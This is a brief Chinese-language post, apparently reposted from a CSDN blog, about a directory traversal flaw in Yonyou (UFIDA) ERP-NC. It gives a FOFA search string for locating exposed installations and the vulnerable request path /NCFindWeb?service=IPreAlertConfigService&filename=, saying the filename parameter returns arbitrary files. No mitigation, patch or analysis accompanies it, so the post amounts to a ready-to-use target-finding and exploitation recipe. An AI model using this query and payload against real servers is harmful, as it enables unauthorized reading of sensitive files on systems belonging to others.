用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
fofa直接搜索:
app="用友-UFIDA-NC"
漏洞拼接目录:
/NCFindWeb?service=IPreAlertConfigService&filename /NCFindWeb?service=IPreAlertConfigService&filename=
/NCFindWeb?service=IPreAlertConfigService&filename
/NCFindWeb?service=IPreAlertConfigService&filename=
读取:filename=读取的文件名
原文:https://blog.csdn.net/l1593572468/article/details/121405863
注册 登录
用户名: demo; 密码: 123456
QQ:769220720
